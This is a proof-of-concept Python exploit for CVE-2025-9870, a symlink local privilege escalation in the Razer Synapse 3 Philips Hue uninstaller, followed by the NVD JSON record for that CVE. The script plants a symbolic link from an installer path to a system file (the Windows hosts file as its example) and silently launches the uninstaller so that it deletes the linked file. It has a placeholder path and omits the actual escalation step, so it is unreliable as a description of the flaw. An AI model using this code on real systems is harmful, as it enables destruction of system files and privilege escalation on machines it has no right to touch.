CVE-2025-9870

# CVE-2025-9870 PoC - Razer Synapse 3 Symlink LPE # Target: Razer Synapse 3 RazerPhilipsHueUninstall # Environment: Windows with Razer Synapse 3 installed import os import sys import subprocess import shutil import ctypes def create_symlink(target, link_name): """Create a symbolic link (requires admin on older Windows)""" try: if os.path.exists(link_name): os.remove(link_name) os.symlink(target, link_name) print(f"[+] Symlink created: {link_name} -> {target}") return True except Exception as e: print(f"[-] Failed to create symlink: {e}") return False def exploit(): """ Exploitation steps: 1. Identify target file to delete (e.g., security-related DLL) 2. Create symlink from installer target path to critical file 3. Trigger RazerPhilipsHueUninstall 4. Leverage for privilege escalation """ # Step 1: Identify Razer Synapse installation path razer_path = r"C:\Program Files\Razer\Synapse3" uninstall_path = os.path.join(razer_path, "RazerPhilipsHueUninstall.exe") # Step 2: Target critical file for deletion # Replace with actual vulnerable path from Philips Hue module vulnerable_path = r"C:\Users\Public\Documents\PhilipsHue\temp\config.dat" target_file = r"C:\Windows\System32\drivers\etc\hosts" # Example target # Step 3: Create parent directory if needed parent_dir = os.path.dirname(vulnerable_path) if not os.path.exists(parent_dir): os.makedirs(parent_dir, exist_ok=True) # Step 4: Create symlink if create_symlink(target_file, vulnerable_path): print("[+] Symlink ready, triggering uninstaller...") # Step 5: Trigger uninstaller (may require user interaction) try: subprocess.Popen([uninstall_path], creationflags=subprocess.CREATE_NO_WINDOW) print("[+] Uninstaller triggered") except Exception as e: print(f"[-] Failed to trigger uninstaller: {e}") return True if __name__ == "__main__": if ctypes.windll.shell32.IsUserAnAdmin(): print("[!] Run as low-privilege user for proper testing") else: print("[*] Running as low-privilege user") exploit()

{"cve": {"id": "CVE-2025-9870", "sourceIdentifier": "[email protected]", "published": "2025-10-29T20:15:37.080", "lastModified": "2025-11-04T21:31:48.707", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Razer Synapse 3 RazerPhilipsHueUninstall Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Razer Synapse 3. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the Philips HUE module installer. By creating a symbolic link, an attacker can abuse the installer to delete arbitrary files. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-26375."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-59"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:razer:synapse:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.10.730.71519", "matchCriteriaId": "3EF1AF2E-84DF-4252-B5F7-DB4DACFBA510"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-921/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}